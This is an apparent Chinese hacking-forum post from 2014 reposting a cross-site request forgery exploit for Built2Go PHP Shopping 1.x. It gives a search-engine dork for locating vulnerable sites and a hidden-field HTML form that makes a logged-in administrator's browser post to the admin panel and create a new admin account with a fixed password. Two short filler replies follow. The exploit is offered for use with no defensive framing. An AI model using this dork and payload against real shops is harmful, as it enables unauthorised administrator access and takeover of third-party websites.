搜索
查看: 666|回复: 2

Built2Go PHP Shopping跨站请求伪造漏洞

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2014-1-21 23:01:34 来自手机 | 显示全部楼层 |阅读模式
Built2Go PHP Shopping v 1.x – CSRF Vulnerability(add admin)
====================================================================

####################################################################


.:. Dork : “Powered by Built2Go PHP Shopping”
####################################################################

===[ Exploit ]===

<form method=”POST” name=”form0″ action=”
http://SITE/adminpanel/edit_admin.php”>
<input type=”hidden” name=”userid” value=”ADMIN”/>
<input type=”hidden” name=”pass” value=”12121212″/>
<input type=”hidden” name=”retypepass” value=”12121212″/>
<input type=”hidden” name=”addnew” value=”1″/>
<input type=”hidden” name=”action” value=”save”/>
<input type=”hidden” name=”new” value=”Submit”/>
</form>

</body>
</html>

####################################################################
专业回帖 该用户已被删除
发表于 2014-1-21 23:39:32 | 显示全部楼层
过来看看的
854955425 该用户已被删除
发表于 2014-1-21 23:52:18 | 显示全部楼层
学习了,不错,讲的太有道理了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表